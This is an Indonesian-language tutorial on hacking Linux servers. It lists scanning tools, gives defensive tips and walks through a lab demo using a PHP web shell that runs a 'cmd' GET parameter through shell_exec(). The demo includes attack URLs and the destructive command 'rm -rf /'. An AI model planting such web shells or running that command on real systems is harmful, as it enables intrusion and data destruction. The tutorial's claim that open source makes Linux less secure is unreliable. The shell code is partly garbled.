Meretas OS Linux: Meretas dengan Ubuntu (Tutorial Perintah)

Daftar Isi:

Anonim

Linux adalah sistem operasi server yang paling banyak digunakan, terutama untuk server web. Ini adalah open source; ini berarti setiap orang dapat memiliki akses ke kode sumber. Ini membuatnya kurang aman dibandingkan dengan sistem operasi lain karena penyerang dapat mempelajari kode sumber untuk menemukan kerentanan . Linux untuk Peretas adalah tentang mengeksploitasi kerentanan ini untuk mendapatkan akses tidak sah ke sistem.

Pada artikel ini, kami akan memperkenalkan Anda tentang apa itu Linux, kerentanan keamanannya, peretasan dengan Ubuntu dan tindakan balasan yang dapat Anda lakukan.

Topik dibahas dalam tutorial ini

  • Catatan Cepat di Linux
  • Alat Peretasan Linux
  • Bagaimana mencegah peretasan Linux
  • Aktivitas Peretasan: Meretas sistem Linux menggunakan PHP

Catatan Cepat di Linux

Linux adalah sistem operasi open source . Ada banyak distribusi sistem operasi berbasis Linux seperti Redhat, Fedora, dan Ubuntu, dll. Tidak seperti sistem operasi lain, Linux kurang aman dalam hal keamanan. Ini karena kode sumber tersedia secara gratis, sehingga mudah untuk mempelajari kerentanan dan mengeksploitasinya dibandingkan dengan sistem operasi lain yang bukan open source. Linux dapat digunakan sebagai sistem operasi server, desktop, tablet, atau perangkat seluler.

Program Linux dapat dioperasikan menggunakan GUI atau perintah. Perintah Linux untuk peretasan Kali Linux lebih efektif dan efisien dibandingkan dengan menggunakan GUI. Untuk alasan ini, ada baiknya mengetahui perintah Linux dasar untuk peretasan.

Lihat tutorial ini https://www.guru99.com/unix-linux-tutorial.html tentang cara memulai hack Kali Linux.

Alat Peretasan Linux

  • Nessus - alat ini dapat digunakan untuk hack Ubuntu, memindai pengaturan konfigurasi, patch, dan jaringan, dll. Dapat ditemukan di https://www.tenable.com/products/nessus
  • NMap. Alat ini dapat digunakan untuk memantau host yang berjalan di server dan layanan yang mereka gunakan. Ini juga dapat digunakan untuk memindai port. Ini dapat ditemukan di https://nmap.org/
  • SARA - SARA adalah singkatan dari Security Auditor's Research Assistant. Sesuai dengan namanya, alat ini dapat digunakan untuk mengaudit jaringan terhadap ancaman seperti SQL Injection, XSS, dll. Dapat ditemukan di http://www-arc.com/sara/sara.html

Daftar di atas tidak lengkap; ini memberi Anda gambaran tentang alat yang tersedia untuk peretasan dan peretasan Ubuntu sistem Linux.

Bagaimana mencegah peretasan Linux

Peretasan Linux memanfaatkan kerentanan di sistem operasi. Suatu organisasi dapat mengadopsi kebijakan berikut untuk melindungi dirinya dari serangan semacam itu.

  • Manajemen patch - patch memperbaiki bug yang dieksploitasi oleh penyerang untuk merusak sistem. Kebijakan manajemen tambalan yang baik akan memastikan bahwa Anda terus menerapkan tambalan yang relevan ke sistem Anda.
  • Konfigurasi OS yang tepat - eksploitasi lain memanfaatkan kelemahan dalam konfigurasi server. Nama pengguna dan daemon yang tidak aktif harus dinonaktifkan. Pengaturan default seperti kata sandi umum untuk aplikasi, nama pengguna default dan beberapa nomor port harus diubah.
  • Sistem Deteksi Intrusi - alat semacam itu dapat digunakan untuk mendeteksi akses tidak sah ke sistem. Beberapa alat memiliki kemampuan untuk mendeteksi dan mencegah serangan semacam itu.

Aktivitas Peretasan: Meretas Sistem Linux Ubuntu menggunakan PHP

Dalam skenario praktis ini, kami akan belajar cara meretas dengan Ubuntu dan kami akan memberi Anda informasi dasar tentang bagaimana Anda dapat menggunakan PHP untuk berkompromi dengan Linux. Kami tidak akan menargetkan korban manapun. Jika Anda ingin mencobanya, Anda dapat menginstal LAMPP di komputer lokal Anda.

PHP hadir dengan dua fungsi yang dapat digunakan untuk menjalankan perintah peretasan Linux. Ini memiliki fungsi exec () dan shell_exec (). Fungsi exec () mengembalikan baris terakhir dari output perintah sementara shell_exec () mengembalikan seluruh hasil perintah sebagai string.

Untuk tujuan demonstrasi, anggap saja manajer penyerang mengunggah file berikut di server web.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

SINI,

Skrip di atas mendapatkan perintah dari variabel GET bernama cmd. Perintah dijalankan menggunakan shell_exec () dan hasilnya dikembalikan di browser.

Kode di atas dapat dimanfaatkan menggunakan URL berikut

http: //localhost/cp/konsole.php? cmd = ls% 20-l

SINI,

  • “… Konsole.php? Cmd = ls% 20-l” memberikan nilai ls -l ke variabel cmd .

Perintah di Ubuntu untuk meretas server akan dijalankan sebagai

shell_exec('ls -l') ;

Menjalankan kode di atas pada server web memberikan hasil yang mirip dengan berikut ini.

Perintah di atas hanya menampilkan file di direktori saat ini dan izinnya

Misalkan penyerang melewati perintah berikut

rm -rf /

SINI,

  • "Rm" menghapus file
  • “Rf” membuat perintah rm berjalan dalam mode rekursif. Menghapus semua folder dan file
  • “/” Menginstruksikan perintah untuk mulai menghapus file dari direktori root

URL serangan akan terlihat seperti ini

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Ringkasan

  • Linux adalah sistem operasi populer untuk server, desktop, tablet, dan perangkat seluler.
  • Linux adalah open source, dan kode sumbernya dapat diperoleh siapa saja. Ini memudahkan untuk menemukan kerentanan. Ini adalah salah satu OS terbaik untuk peretas.
  • Perintah peretasan dasar dan jaringan di Ubuntu sangat berharga bagi peretas Linux.
  • Kerentanan adalah kelemahan yang dapat dimanfaatkan untuk mengganggu sistem.
  • Keamanan yang baik dapat membantu melindungi sistem agar tidak disusupi oleh penyerang.